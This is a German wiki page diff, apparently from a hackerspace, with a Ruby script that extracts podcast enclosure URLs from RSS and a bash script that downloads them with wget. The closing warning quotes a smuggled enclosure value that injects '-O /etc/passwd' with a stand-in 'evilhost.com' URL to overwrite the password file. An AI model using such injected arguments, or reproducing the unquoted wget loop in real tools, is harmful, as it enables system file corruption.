Podcast-fetching: Unterschied zwischen den Versionen

Aus C3D2
Wechseln zu: Navigation, Suche
(Kategorie hinzugefügt)
K (Linkify)
Zeile 1: Zeile 1:
Damit im [[Office2]] keine Bandbreite verschenkt wird, während niemand da ist, soll [[Aromaster]] ein paar Podcasts runterladen. Das wird natürlich manuell ausgeführt.
+
Damit im [[Office2]] keine Bandbreite verschenkt wird, während niemand da ist, soll [[Office2/Netz#aromaster|Aromaster]] ein paar Podcasts runterladen. Das wird natürlich manuell ausgeführt.
  
 
==podcast-enclosures.rb==
 
==podcast-enclosures.rb==

Version vom 2. Januar 2006, 03:29 Uhr

Damit im Office2 keine Bandbreite verschenkt wird, während niemand da ist, soll Aromaster ein paar Podcasts runterladen. Das wird natürlich manuell ausgeführt.

podcast-enclosures.rb

#!/usr/bin/env ruby

require 'rexml/document'

if ARGV.size != 1
  puts "Usage: #{$0} <podcast.rss>"
  exit
end

file = File.new(ARGV[0])
REXML::Document.new(file).root.each_element("//enclosure") { |e|
  puts e.attributes['url']
}

fetch_radiochaotica.sh

#!/usr/bin/env bash

WGETFLAGS='-c'

cd /home/astro/public_html/radiochaotica/

wget -O radiochaotica.rss http://blogs.bl0rg.net/radio_chaotica/index.xml
for url in $(ruby ~/podcast-enclosures.rb radiochaotica.rss); do
	wget $WGETFLAGS $url
done

rm radiochaotica.rss

Vor Aktion sollte man den Feed vielleicht noch manuell betrachten, sonst kann man dem wget-Aufruf Parameter untermogeln. Z.B.:

<enclosure url="-O /etc/passwd http://evilhost.com/megaevil-password-file" />